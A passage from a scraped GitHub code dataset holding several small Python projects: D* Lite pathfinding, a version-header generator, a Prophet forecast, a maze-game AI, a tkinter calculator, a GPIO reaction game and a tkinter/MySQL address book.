Lite is equivalent to A*, because the information used in the search is\n all accurate.\"\"\"\n\n dStarRunner = DStarAlgorithm(graph, startVert, goalVert)\n route = dStarRunner.computeShortestPath()\n return route\n\n\ndef DStarGlobal(graph, startVert, goalVert, percWrong=20):\n \"\"\"This algorithm search a graph using D* Lite for\n a path from some start to some goal. It simulates incorrect\n information about the world by modifying percWrong percent\n of the cells in the graph to have a different value. Then,\n after the first route is generated, the correct data is\n provided to the DStarLite object, and it updates its route.\"\"\"\n if graph.__class__.__name__ != \"GridGraph\":\n print(\"DStarGlobal only works on Grid Graphs, try again.\")\n return\n correctInfo, incorrectGraph = corruptGraph(graph, percWrong)\n # print(\"CORRUPTED GRAPH:\")\n # incorrectGraph.printGrid()\n dStarRunner = DStarAlgorithm(incorrectGraph, startVert, goalVert)\n t1 = time.time()\n route1 = dStarRunner.computeShortestPath()\n t2 = time.time()\n print(\"First route found is:\")\n print(route1)\n print(\"Time elapsed:\", t2 - t1)\n # graph.printWithRoute(route1)\n\n # print(\"--------\")\n # print(\"CORRECT MAP:\")\n # graph.printGrid()\n print(\"Correcting information...\")\n dStarRunner.correctInformation(correctInfo)\n\n t1 = time.time()\n route2 = dStarRunner.computeShortestPath()\n t2 = time.time()\n if route1 == route2:\n print(\"SAME ROUTE\")\n print(\"Fixed route found is:\")\n print(route2)\n print(\"Time elapsed:\", t2 - t1)\n # graph.printWithRoute(route2)\n return route2\n\n\ndef DStarLocal(graph, startVert, goalVert, percWrong=20):\n \"\"\"This algorithm search a graph using D* Lite for\n a path from some start to some goal. It simulates incorrect\n information about the world by modifying percWrong percent\n of the cells in the graph to have a different value. Then,\n after the first route is generated, the function determines when\n the route comes close to an incorrect value, and it feeds a small number of corrections at a time to DStarLite..\"\"\"\n if graph.__class__.__name__ != \"GridGraph\":\n print(\"DStarGlobal only works on Grid Graphs, try again.\")\n return\n correctInfo, incorrectGraph = corruptGraph(graph, percWrong)\n print(\"CORRUPTED GRAPH:\")\n dStarRunner = DStarAlgorithm(incorrectGraph, startVert, goalVert)\n print(\"First pass...\")\n t1 = time.time()\n route1 = dStarRunner.computeShortestPath()\n t2 = time.time()\n print(\"First route found is:\")\n print(route1)\n print(\"Time elapsed:\", t2 - t1)\n # incorrectGraph.printWithRoute(route1)\n mapWid = graph.getWidth()\n mapHgt = graph.getHeight()\n for cell in route1:\n (r, c) = graph.getData(cell)\n badNeighbors = findIncorrectNeighbors(correctInfo, r, c, mapWid, mapHgt)\n if len(badNeighbors) > 0:\n print(\"Incorrect neighbors:\", badNeighbors)\n print(\"Correcting information...\")\n dStarRunner.correctInformation(badNeighbors)\n t1 = time.time()\n nextRoute = dStarRunner.computeShortestPath()\n t2 = time.time()\n print(\"Fixed route found is:\")\n print(nextRoute)\n print(\"Time elapsed:\", t2 - t1)\n # graph.printWithRoute(nextRoute)\n return nextRoute\n\n\ndef findIncorrectNeighbors(correctInfo, row, col, wid, hgt):\n \"\"\"Takes in the dictionary of correct information, along\n with a row and column of a cell in the occupancy grid, and the size\n of the occupancy grid. It checks if any of the nine cells centered\n on row and col are incorrect. If so, they, along with the correct\n information, are added to the dictionary. That dictionary is returned.\"\"\"\n bads = {}\n for r in [row - 1, row, row + 1]:\n for c in [col - 1, col, col + 1]:\n if (r >= 0) and (r < wid) and (c >= 0) and (c < hgt):\n if (r, c) in correctInfo:\n bads[r, c] = correctInfo[r, c]\n del correctInfo[r, c]\n return bads\n\n\ndef corruptGraph(oldGraph, percWrong):\n \"\"\"Takes in an old grid graph and the percentage that should\n be modified, and returns a dictionary containing the correct\n values, so they can be fixed later, and a new graph with\n modified values.\"\"\"\n graph = oldGraph.copy()\n graphSize = graph.getSize()\n minC = oldGraph.getMinCost()\n maxC = oldGraph.getMaxCost()\n #print(\"minC =\", minC, \"maxC =\", maxC)\n correctInfo = {}\n for i in range(percWrong * graphSize // 100):\n randNode = random.randrange(graphSize)\n (randRow, randCol) = graph.getData(randNode)\n randVal = random.randint(minC, maxC)\n correctInfo[randRow, randCol] = graph.getCellValue(randRow, randCol)\n graph.setCellValue(randRow, randCol, randVal)\n graph.graphFromGrid()\n return correctInfo, graph\n","repo_name":"dletk/COMP380-Spring-2018","sub_path":"hw4/DStarLite.py","file_name":"DStarLite.py","file_ext":"py","file_size_in_byte":11125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"72942468671","text":"#!/usr/bin/env python\n\nfrom create_header import do_replace\nimport optparse\nimport re\nimport string\nimport subprocess\nimport sys\n\n# for creating version.h\nGET_COMMIT_ID = 'git log --pretty=format:%H -1'\nVERSION_ID_KEY = '@LINEAR_VERSION_ID@'\nCOMMIT_ID_KEY = '@LINEAR_COMMIT_ID@'\n\n_usage = 'usage: %prog [options]'\n\n\ndef read_commit_id_and_version(ac, kv):\n try:\n proc = subprocess.Popen(GET_COMMIT_ID,\n stdout=subprocess.PIPE,\n shell=True)\n kv[COMMIT_ID_KEY] = proc.stdout.readlines()[0].decode('utf-8')\n except:\n kv[COMMIT_ID_KEY] = \"\"\n \n f = open(ac, 'r')\n if f:\n for line in f:\n inner = re.search('AC_INIT\\((.*)\\)', line)\n if not inner:\n continue\n r = re.findall('\\[(.+?)\\]', inner.group(1))\n kv[VERSION_ID_KEY] = r[0] + '-' + r[1]\n\n return kv\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser(usage=_usage)\n parser.add_option('-c', '--configure_ac', dest='ac',\n help='configure.ac file', metavar='/path/to/configure.ac')\n parser.add_option('-i', '--input', dest='input',\n help='input file', metavar='/path/to/file_name')\n parser.add_option('-o', '--output', dest='output',\n help='output file', metavar='/path/to/file_name')\n (opts, args) = parser.parse_args()\n if not opts.ac:\n parser.error('you must specify configure.ac file')\n if not opts.input:\n parser.error('you must specify input file')\n if not opts.output:\n parser.error('you must specify output file')\n\n opts.replace = {\n VERSION_ID_KEY: 'package-version',\n COMMIT_ID_KEY: '-'\n }\n opts.replace = read_commit_id_and_version(opts.ac, opts.replace)\n sys.exit(do_replace(opts))\n","repo_name":"linear-rpc/linear-cpp","sub_path":"tools/create_version_h.py","file_name":"create_version_h.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"60"} +{"seq_id":"9881765057","text":"# make an out-of-sample forecast\r\nfrom pandas import read_csv\r\nfrom pandas import to_datetime\r\nfrom pandas import DataFrame\r\nfrom fbprophet import Prophet\r\nfrom matplotlib import pyplot\r\n#import psycopg2\r\n#from sklearn.metrics import mean_absolute_error\r\n\r\n# load data\r\npath = \"D:/Projects/prophet/data.csv\"\r\ndf = read_csv(path, header=0)\r\n# prepare expected column names\r\ndf.columns = ['ds', 'y']\r\ndf['ds'] = to_datetime(df['ds'])\r\n\r\n# define the model\r\nmodel = Prophet()\r\n# fit the model\r\nmodel.fit(df)\r\n\r\nfuture = list()\r\na = \"2012-12-10\"\r\nfor index, row in df.iterrows():\r\n if ((str)(row['ds']) > (str)(a)) :\r\n future.append(row['ds'])\r\n \r\nfuture = DataFrame(future)\r\nfuture.columns = ['ds']\r\nfuture['ds'] = to_datetime(future['ds'])\r\n# use the model to make a forecast\r\nforecast = model.predict(future)\r\n# summarize the forecast\r\nprint(forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].head())\r\n# plot forecast\r\nmodel.plot(forecast)\r\npyplot.show()\r\n","repo_name":"DoctorKocte/prophet","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31417240629","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport lib.interface as interface\nimport lib.utils as u\nimport lib.algorithms as algo\n\nimport os\nIAName = \"closest2\"\n\n\n(mazeWidth, mazeHeight, mazeMap, preparationTime, turnTime, playerLocation, opponentLocation, coins, gameIsOver) = interface.initGame(IAName)\nroute = []\nmazeMap[(-1, -1)] = ()\n\ndef next_way(playerLocation, coins):\n \"\"\"\n Cette fonction\n est\n plutot\n cool\n en effet tout est dedans\n mais il faut faire attention\n car sinon on ne pourra rien décoder\n de plus les jours nous sont comptés\n \"\"\"\n candidates = algo.dijkstra(mazeMap, playerLocation)\n dist = float(\"inf\")\n coin = (-1,-1)\n for c in coins:\n if candidates[1][c] < dist:\n dist = candidates[1][c]\n coin = c\n coins.remove(coin)\n return u.way_width(candidates[0], playerLocation, coin)\n\ndef get_pid_en(name):\n \"\"\"\n Cette fonction\n est\n plutot\n cool\n en effet tout est dedans\n mais il faut faire attention\n car sinon on ne pourra rien décoder\n de plus les jours nous sont comptés\n \"\"\"\n return [int(f) for f in check_output([\"pidof\", name]).split() if int(f) != os.getpid()]\n\n\n\ndef initialisationTurn(mazeWidth, mazeHeight, mazeMap, timeAllowed, playerLocation, opponentLocation, coins) :\n \"\"\"\n Cette fonction\n est\n plutot\n cool\n en effet tout est dedans\n mais il faut faire attention\n car sinon on ne pourra rien décoder\n de plus les jours nous sont comptés\n \"\"\"\n global route\n\n route = next_way(playerLocation, coins)\n\n\ndef determineNextMove(playerLocation, opponentLocation, coins):\n \"\"\"\n Cette fonction\n est\n plutot\n cool\n en effet tout est dedans\n mais il faut faire attention\n car sinon on ne pourra rien décoder\n de plus les jours nous sont comptés\n \"\"\"\n global route\n load_route()\n if len(route) == 0:\n route = next_way(playerLocation, coins)\n else: \n ennemy_dists = algo.dijkstra(mazeMap, opponentLocation)\n if ennemy_dists[1][route[-1]] < len(route):\n route = next_way(playerLocation, coins)\n next_pos = route.pop(0)\n return u.direction(playerLocation, next_pos)\n\n\n\n# Init our AI\ninitialisationTurn(mazeWidth, mazeHeight, mazeMap, preparationTime, playerLocation, opponentLocation, coins)\n\n# <>\n\n\n# Starts the game\ninterface.startGameMainLoop(determineNextMove)\nquit()","repo_name":"dimtion/jml","sub_path":"inputFiles/ourIA/closest2.py","file_name":"closest2.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"4966715329","text":"x=str(input(\"Enter the string:\"))\ndigit=0\nletter=0\nothers=0\nt=len(x)\nfor i in range(0,t):\n if x[i].isnumeric():\n digit += 1\n elif x[i].isalpha():\n letter+=1\n else:\n others+=1\nprint(others)\n","repo_name":"Subashini06/SUBA","sub_path":"countngsplchar.py","file_name":"countngsplchar.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34738750406","text":"from gpiozero import *\nfrom time import sleep\nimport random\n\nplayer1_name = input('What is your name? ')\nprint ('Hello ' + player1_name +'!')\n\nplayer2_name = input('What is your name? ')\nprint ('Hello ' + player2_name +'!')\n\nled = LED(18)\nplayer1 = Button (14)\nplayer2 = Button (25)\n\nled.on ()\nsleep (random.uniform(5,10))\nled.off ()\n\ndef pressed (button):\n if button.pin.number == 14:\n print (player1_name + ' Won the game')\n else:\n print (player2_name + ' Won the game')\n\nplayer1.when_pressed = pressed\nplayer2.when_pressed = pressed","repo_name":"RaspiKidd/QuickReactionGame","sub_path":"Python/quickReactionGame.py","file_name":"quickReactionGame.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17404570480","text":"from tkinter import Tk, Button, Entry, END\n\n# Configuración ventana principal\nroot = Tk()\nroot.title(\"Calculadora POO\")\nroot.resizable(0,0)\nroot.geometry('280x250')\n\n# Configuración pantalla de salida \npantalla = Entry(root, width=22, bg=\"black\", fg=\"white\", borderwidth=0, font=(\"arial\", 18, \"bold\"))\npantalla.grid(row=0, column=0, columnspan=4, padx=1, pady=1)\n\n# Configuración eventos\ningreso = \"\"\ndef botones(click):\n valor_ingresado = click.widget.cget(\"text\")\n pantalla.insert(END, valor_ingresado)\n ingreso += valor_ingresado\n\ndef operacion(click):\n if \"-\" in ingreso:\n numeros = ingreso.split(\"-\")\n result = float(numeros[0]) - float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n elif \"+\" in ingreso:\n numeros = ingreso.split(\"+\")\n result = float(numeros[0]) + float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n elif \"/\" in ingreso:\n numeros = ingreso.split(\"/\")\n result = float(numeros[0]) / float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n elif \"*\" in ingreso:\n numeros = ingreso.split(\"*\")\n result = float(numeros[0]) * float(numeros[-1])\n pantalla.delete(0,END)\n pantalla.insert(END, str(result))\n\n\n\n# Configuración botones\nboton_1 = Button(root, text=\"1\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=1, column=0, padx=1, pady=1)\nboton_1.bind(\"\", botones)\n\nboton_2 = Button(root, text=\"2\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=1, column=1, padx=1, pady=1)\nboton_2.bind(\"\", botones)\n\nboton_3 = Button(root, text=\"3\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=1, column=2, padx=1, pady=1)\nboton_3.bind(\"\", botones)\n\nboton_4 = Button(root, text=\"4\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=2, column=0, padx=1, pady=1)\nboton_4.bind(\"\", botones)\n\nboton_5 = Button(root, text=\"5\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=2, column=1, padx=1, pady=1)\nboton_5.bind(\"\", botones)\n\nboton_6 = Button(root, text=\"6\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=2, column=2, padx=1, pady=1)\nboton_6.bind(\"\", botones)\n\nboton_7 = Button(root, text=\"7\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=3, column=0, padx=1, pady=1)\nboton_7.bind(\"\", botones)\n\nboton_8 = Button(root, text=\"8\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=3, column=1, padx=1, pady=1)\nboton_8.bind(\"\", botones)\n\nboton_9 = Button(root, text=\"9\", width=9, height=3, bg=\"white\", fg=\"red\", borderwidth=0, cursor=\"hand2\").grid(row=3, column=2, padx=1, pady=1)\nboton_9.bind(\"\", botones)\n\nboton_igual = Button(root, text=\"=\", width=20, height=3, bg=\"red\", fg=\"white\", borderwidth=0, cursor=\" hand2\").grid(row=4, column=0, columnspan=2, padx=1, pady=1)\nboton_igual.bind(\"\", operacion)\n\nboton_punto = Button(root, text=\".\", width=9, height=3, bg=\"spring green\", fg=\"black\", cursor=\"hand2\", borderwidth=0).grid(row=4, column=2, padx=1, pady=1)\nboton_punto.bind(\"\", botones)\n\nboton_mas = Button(root, text=\"+\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\").grid(row=1, column=3, padx=1, pady=1)\nboton_mas.bind(\"\", botones)\n\nboton_menos = Button(root, text=\"-\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\").grid(row=2, column=3, padx=1, pady=1)\nboton_menos.bind(\"\", botones)\n\nboton_multiplicacion = Button(root, text=\"*\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\").grid(row=3, column=3, padx=1, pady=1)\nboton_multiplicacion.bind(\"\", botones)\n\nboton_division = Button(root, text=\"/\", width=9, height=3, bg=\"deep sky blue\", fg=\"black\", borderwidth=0, cursor=\"hand2\").grid(row=4, column=3, padx=1, pady=1)\nboton_division.bind(\"\", botones)\nroot.mainloop()\n\n\n","repo_name":"POO2023-01-UNALMED/taller-9-python-angomezz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15259381626","text":"from __future__ import print_function\nfrom tkinter import *\nimport tkinter as ttk\nfrom tkinter import Tk\nfrom tkinter import messagebox\nfrom typing import List\nimport os.path\nimport numpy as np\n\nimport datetime\nimport mysql.connector\n\n\ncnx = mysql.connector.connect(user='pi', password='',\n host='192.168.2.100',\n database='adressbuch')\n\nclass Main:\n def __init__(self):\n\n # Fenster wird erzeugt\n main_win = Tk()\n main_win.title('Adressbuch')\n\n main_win.columnconfigure(0, weight=1)\n main_win.rowconfigure(0, weight=1)\n\n self.menue = Menue(main_win)\n\n main_win.mainloop()\n\n\nclass Menue(ttk.Frame):\n def __init__(self, parent):\n super().__init__(parent)\n\n # Erstellen des MenueFrames\n menue_frame = ttk.Frame(borderwidth=2, width=200, height=150)\n\n # MenuFrame wird ausgerichtet und vergrößert sich automatisch\n menue_frame.grid_propagate(0)\n menue_frame.grid(sticky=(W + N + S + E))\n\n # Frame wird dynamisch\n menue_frame.columnconfigure(0, weight=1)\n menue_frame.rowconfigure(0, weight=1)\n menue_frame.rowconfigure(1, weight=1)\n menue_frame.rowconfigure(2, weight=1)\n menue_frame.rowconfigure(3, weight=1)\n\n # Erstellen der Buttons\n hinzufuegen_button = ttk.Button(menue_frame, text=\"Hinzufügen\", command=lambda: hinzufügen(parent), width=10)\n abrufen_button = ttk.Button(menue_frame, text=\"Abrufen\", command=lambda: abfragen(parent), width=10)\n alleAbrufen_button = ttk.Button(menue_frame, text=\"Alle Abrufen\",command=lambda: alleAbfragen(parent), width=10)\n\n # Erstellen des Labels\n adressbuch = Label(menue_frame, text=\"Adressbuch\", font=(\"Helvetica\", 16))\n\n # Widgets werden angeordnet\n adressbuch.grid(column=0, row=0)\n hinzufuegen_button.grid(column=0, row=1)\n abrufen_button.grid(column=0, row=2)\n alleAbrufen_button.grid(column=0, row=3)\n\n\nclass Mask(ttk.Frame):\n def __init__(self, parent, number=False):\n self.dict = {}\n self.parent = parent\n # erstellen des Frames\n super().__init__(parent)\n self.columnconfigure(1, weight=1)\n self.grid(column=0, row=0, sticky=(W + N + S + E))\n\n # erstellen und einfügen der Labels\n VornameLabel = ttk.Label(self, text=\"Vorname\")\n NachnameLabel = ttk.Label(self, text=\"Nachname\")\n StraßeLabel = ttk.Label(self, text=\"Straße\")\n HausNrLabel = ttk.Label(self, text=\"Hausnummer\")\n OrtLabel = ttk.Label(self, text=\"Ort\")\n PLZLabel = ttk.Label(self, text=\"Postleitzahl\")\n LandLabel = ttk.Label(self, text=\"Land\")\n birthdateDayLabel = ttk.Label(self, text=\"Geburtstag\")\n birthdateMonthLabel = ttk.Label(self, text=\"Geburtsmonat\")\n birthdateYearLabel = ttk.Label(self, text=\"Geburtsjahr\")\n\n VornameLabel.grid(column=0, row=1)\n NachnameLabel.grid(column=0, row=2)\n StraßeLabel.grid(column=0, row=3)\n HausNrLabel.grid(column=0, row=4)\n OrtLabel.grid(column=0, row=5)\n PLZLabel.grid(column=0, row=6)\n LandLabel.grid(column=0, row=7)\n birthdateDayLabel.grid(column=0, row=8)\n birthdateMonthLabel.grid(column=0, row=9)\n birthdateYearLabel.grid(column=0, row=10)\n\n # erstellen und einfügen der Entrys zu den jeweiligen Labels\n self.VornameEntry = ttk.Entry(self)\n self.NachnameEntry = ttk.Entry(self)\n self.StraßeEntry = ttk.Entry(self)\n self.HausNrEntry = ttk.Entry(self)\n self.OrtEntry = ttk.Entry(self)\n self.PLZEntry = ttk.Entry(self)\n self.LandEntry = ttk.Entry(self)\n self.birthdateDayEntry = ttk.Entry(self)\n self.birthdateMonthEntry = ttk.Entry(self)\n self.birthdateYearEntry = ttk.Entry(self)\n\n self.VornameEntry.grid(column=1, row=1)\n self.VornameEntry.focus()\n self.NachnameEntry.grid(column=1, row=2)\n self.StraßeEntry.grid(column=1, row=3)\n self.HausNrEntry.grid(column=1, row=4)\n self.OrtEntry.grid(column=1, row=5)\n self.PLZEntry.grid(column=1, row=6)\n self.LandEntry.grid(column=1, row=7)\n self.birthdateDayEntry.grid(column=1, row=8)\n self.birthdateMonthEntry.grid(column=1, row=9)\n self.birthdateYearEntry.grid(column=1, row=10)\n\n # Nummer wird nur auf anfrage beim Aufruf erstellt\n if number == True:\n NummerLabel = ttk.Label(self, text=\"Nummer\")\n self.NummerEntry = ttk.Entry(self)\n self.NummerEntry.grid(column=1, row=11)\n NummerLabel.grid(column=0, row=11)\n\n def collect(self, number=False, checkForCompleteDate=False):\n \"\"\"\n\n :type number: boolean\n \"\"\"\n is_empty = True\n\n self.dict.clear()\n\n # Einsammeln der Einträge in ein dict wenn kein Wert vorhanden Wert = None\n if self.VornameEntry.get():\n self.dict['Vorname'] = self.VornameEntry.get()\n is_empty = False\n else:\n self.dict['Vorname'] = None\n if self.NachnameEntry.get():\n is_empty = False\n self.dict['Nachname'] = self.NachnameEntry.get()\n else:\n self.dict['Nachname'] = None\n if self.StraßeEntry.get():\n is_empty = False\n self.dict['Straße'] = self.StraßeEntry.get()\n else:\n self.dict['Straße'] = None\n if self.HausNrEntry.get():\n is_empty = False\n self.dict['HausNr'] = self.HausNrEntry.get()\n else:\n self.dict['HausNr'] = None\n if self.OrtEntry.get():\n is_empty = False\n self.dict['Ort'] = self.OrtEntry.get()\n else:\n self.dict['Ort'] = None\n if self.PLZEntry.get():\n is_empty = False\n self.dict['PLZ'] = self.PLZEntry.get()\n else:\n self.dict['PLZ'] = None\n if self.LandEntry.get():\n is_empty = False\n self.dict['Land'] = self.LandEntry.get()\n else:\n self.dict['Land'] = None\n if self.birthdateYearEntry.get():\n is_empty = False\n self.dict['birthdateYear'] = self.birthdateYearEntry.get()\n else:\n self.dict['birthdateYear'] = None\n if self.birthdateMonthEntry.get():\n is_empty = False\n self.dict['birthdateMonth'] = self.birthdateMonthEntry.get()\n else:\n self.dict['birthdateMonth'] = None\n if self.birthdateDayEntry.get():\n is_empty = False\n self.dict['birthdateDay'] = self.birthdateDayEntry.get()\n else:\n self.dict['birthdateDay'] = None\n\n # einsammmeln der Nummer nur wenn Nummer mit angegeben\n if number:\n if self.NummerEntry.get():\n self.dict['Nummer'] = self.NummerEntry.get()\n is_empty = False\n else:\n self.dict['Nummer'] = None\n\n if checkForCompleteDate is True:\n if self.birthdateYearEntry.get() and (not self.birthdateMonthEntry.get() or not self.birthdateDayEntry.get()):\n return 1\n elif self.birthdateMonthEntry.get() and (not self.birthdateYearEntry.get() or not self.birthdateDayEntry.get()):\n return 1\n elif self.birthdateDayEntry.get() and (not self.birthdateYearEntry.get() or not self.birthdateMonthEntry.get()):\n return 1\n if is_empty is True:\n return None\n else:\n return self.dict\n\n\nclass hinzufügen():\n def __init__(self, parent):\n mask = Mask(parent, False)\n\n ttk.Button(mask, text='Ausführen', command=(\n lambda: (insert(mask.collect(False)) if mask.collect(False, True) is not None and mask.collect(False, True) is not 1 else (\n messageboxes.incomplete_birthdate() if mask.collect(False, True) is 1 else messageboxes.no_entry_in_mask()),mask.destroy(), hinzufügen(parent))),\n width=10).grid(\n column=1, row=11)\n ttk.Button(mask, text=\"zurück\", command=mask.destroy, width=10).grid(\n column=0, row=11)\n\n\nclass abfragen():\n def __init__(self, parent):\n mask = Mask(parent, True)\n ausführen = ttk.Button(mask, text='Ausführen', command=lambda: display_entry(parent, self.search(mask.collect(True))) if mask.collect(True, False) is not None and self.search(mask.collect(True)) else (messageboxes.no_entry_in_mask() if mask.collect(True, False) is None else messageboxes.no_entry_in_DB()),\n width=10)\n ausführen.grid(column=1, row=12)\n ttk.Button(mask, text=\"zurück\", command=mask.destroy, width=10).grid(\n column=0, row=12)\n\n def search(self, dict):\n\n\n cursor = cnx.cursor()\n sql_and_data = make_get_and_data_sql(dict)\n\n\n cursor.execute(list(sql_and_data)[0], list(sql_and_data)[1])\n result = cursor.fetchall()\n result_list = []\n for x in result:\n result_list.extend(list(x))\n cnx.commit()\n return result_list\n\nclass alleAbfragen():\n def __init__(self, parent):\n list\n display_entry(parent, self.get_data())\n\n\n\n\n def get_data(self):\n cursor = cnx.cursor()\n\n cursor.execute(\"SELECT * FROM `adressbuch`\")\n result = cursor.fetchall()\n result_list = []\n for x in result:\n result_list.extend(list(x))\n cnx.commit()\n return result_list\n\n\n\nclass display_entry(ttk.Frame):\n def __init__(self, parent, list):\n super().__init__(parent)\n self.grid(column=0, row=0, sticky=(W + N + S + E))\n\n list = np.array(list).reshape(int(len(list) / 9), 9).tolist()\n\n display_entry_frames = []\n for x in range(len(list)):\n display_entry_frames.append(display_entry_frame(self, list[x]))\n\n self.current_page = 0\n menue_bar_frame = ttk.Frame(self)\n vor_button = ttk.Button(menue_bar_frame, text=\">\", command=lambda: update_page(False))\n zurueck_button = ttk.Button(menue_bar_frame, text=\"<\", command=lambda: update_page(True))\n buffer_label = ttk.Label(menue_bar_frame, text=\"sample\")\n vor_button.grid(column=2, row=0)\n zurueck_button.grid(column=0, row=0)\n buffer_label.grid(column=1, row=0)\n menue_bar_frame.grid(column=0, row=0)\n display_entry_frames[self.current_page].grid(column=0, row=1)\n ttk.Button(self, text=\"Zurück\", command=self.destroy, width=10).grid(\n column=0, row=3)\n ttk.Button(self, text=\"Aktualisieren \", command=lambda: (parent.destroy(), Main(), sys.exit) if updat_entry(\n display_entry_frames[self.current_page].mask, True) is None else None, width=10).grid(\n column=1, row=3)\n ttk.Button(self, text=\"Löschen\", command=lambda: (parent.destroy(), Main(), sys.exit) if delete_entry(display_entry_frames[self.current_page].mask.collect(True)['Nummer']) is None else None, width=10).grid(\n column=2, row=3)\n\n def update_page(minus):\n if len(list) is not 1:\n display_entry_frames[self.current_page].grid_forget()\n if minus:\n self.current_page = (self.current_page - 1) % (len(list))\n else:\n self.current_page = (self.current_page + 1) % (len(list))\n\n display_entry_frames[self.current_page].grid(column=0, row=1)\n\n\nclass display_entry_frame(ttk.Frame):\n def __init__(self, parent, list):\n super().__init__(parent)\n self.mask = Mask(self, True)\n self.fillup_None(list)\n self.insert_text(self.mask, list)\n\n def insert_text(self, mask, list):\n mask.VornameEntry.insert(0, str(list[0]))\n mask.NachnameEntry.insert(0, str(list[1]))\n mask.StraßeEntry.insert(0, str(list[2]))\n mask.HausNrEntry.insert(0, str(list[3]))\n mask.OrtEntry.insert(0, str(list[4]))\n mask.PLZEntry.insert(0, str(list[5]))\n mask.LandEntry.insert(0, str(list[6]))\n if str(list[7]) is not '-':\n temp = str(list[7]).split('-')\n else:\n temp = ['-', '-', '-']\n mask.birthdateDayEntry.insert(0, temp[2])\n mask.birthdateMonthEntry.insert(0, temp[1])\n mask.birthdateYearEntry.insert(0, temp[0])\n mask.NummerEntry.grid_forget()\n NummerLabelDisplay = ttk.Label(mask, text=str(list[8]))\n NummerLabelDisplay.grid(column=1, row=11)\n mask.NummerEntry.insert(0, str(list[8]))\n\n def fillup_None(self, list):\n for x in range(len(list)):\n if list[x] is None:\n list[x] = \"-\"\n\n\nclass messageboxes():\n\n @staticmethod\n def incomplete_birthdate():\n messagebox.showerror(\"Error\", \"Sie haben nur Teile des Geburtsdatums angegeben. Bitte vervollständigen sie es.\")\n\n @staticmethod\n def no_entry_in_mask():\n messagebox.showerror(\"Error\", \"Sie haben keinen Wert eingegeben. Bitte versuchen sie es erneut.\")\n\n @staticmethod\n def no_entry_in_DB():\n messagebox.showerror(\"Error\", \"Ihr angeforderter Eintrag existiert nicht\")\n\n @staticmethod\n def entry_updated():\n messagebox.showinfo(\"Updated\", \"Eintrag erfolgreich aktuallisiert\")\n\ndef insert(dict, withNumber=False):\n cursor = cnx.cursor()\n if withNumber is True:\n add = (\n \"INSERT INTO `adressbuch` (`Vorname`, `Nachname`, `Straße`, `HausNr`, `Ort`, `PLZ`, `Land`, `birthdate`, `Nummer`)\"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\")\n\n data = [(dict['Vorname'], dict['Nachname'], dict['Straße'], dict['HausNr'], dict['Ort'], dict['PLZ'],\n dict['Land'], make_date(dict), dict['Nummer'])]\n\n else:\n add = (\n \"INSERT INTO `adressbuch` (`Vorname`, `Nachname`, `Straße`, `HausNr`, `Ort`, `PLZ`, `Land`, `birthdate`)\"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\")\n\n data = [(dict['Vorname'], dict['Nachname'], dict['Straße'], dict['HausNr'], dict['Ort'], dict['PLZ'],\n dict['Land'], make_date(dict))]\n\n cursor.executemany(add, data)\n cnx.commit()\n\n\n\ndef make_date(dict):\n if dict['birthdateMonth'] is not None:\n month = dict['birthdateMonth']\n else:\n month = None\n if dict['birthdateDay'] is not None:\n day = dict['birthdateDay']\n else:\n day = None\n if dict['birthdateYear'] is not None:\n year = dict['birthdateYear']\n else:\n year = None\n\n if month is not None and day is not None and year is not None:\n date = year + \"-\" + month + \"-\" + day\n elif month is not None and day is not None and year is None:\n date = '0000' + \"-\" + month + \"-\" + day\n elif month is not None and year is not None and day is None:\n date = year + \"-\" + month + \"-\" + '00'\n elif month is None and day is not None and year is not None:\n date = year + \"-\" + '00' + \"-\" + day\n elif month is not None:\n date = '0000' + \"-\" + month + \"-\" + '00'\n elif day is not None:\n date = '0000' + \"-\" + '00' + \"-\" + day\n elif year is not None:\n date = year + \"-\" + '00' + \"-\" + '00'\n else:\n date = None\n\n return date\n\n\ndef updat_entry(mask, withNumber=False):\n\n cursor = cnx.cursor()\n\n dict = mask.collect(withNumber)\n for x in dict:\n if dict[x] is '-':\n dict[x] = None\n\n delete_entry(dict['Nummer'], cursor)\n insert(dict, True)\n messageboxes.entry_updated()\n\ndef delete_entry(nummer):\n\n cursor = cnx.cursor()\n delete = \"DELETE FROM 